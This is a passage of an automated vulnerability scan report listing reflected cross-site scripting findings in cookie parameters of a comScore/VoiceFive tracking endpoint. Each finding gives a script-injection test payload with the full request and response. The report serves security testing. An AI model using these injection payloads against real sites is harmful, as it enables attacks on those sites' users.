if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
d Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&8d44c<script>alert(1)</script>06dfc11ec34', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:0
...[SNIP]...

1.162. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p67161473 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/node_hulu.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 35e21<script>alert(1)</script>82f3b1aaf6d was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&35e21<script>alert(1)</script>82f3b1aaf6d; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
)();}COMSCORE.BMX.Buddy.cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&35e21<script>alert(1)</script>82f3b1aaf6d', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:
...[SNIP]...

1.163. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p83612734 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/node_hulu.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 60c44<script>alert(1)</script>36b26e72378 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&60c44<script>alert(1)</script>36b26e72378; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&60c44<script>alert(1)</script>36b26e72378', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1297448662";COMSCORE.BMX.Buddy.start((
...[SNIP]...

1.164. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p85001580 cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/node_hulu.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 288b0<script>alert(1)</script>4b2f2492765 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&288b0<script>alert(1)</script>4b2f2492765; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&288b0<script>alert(1)</script>4b2f2492765', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 11 12:38:42 CST 2011.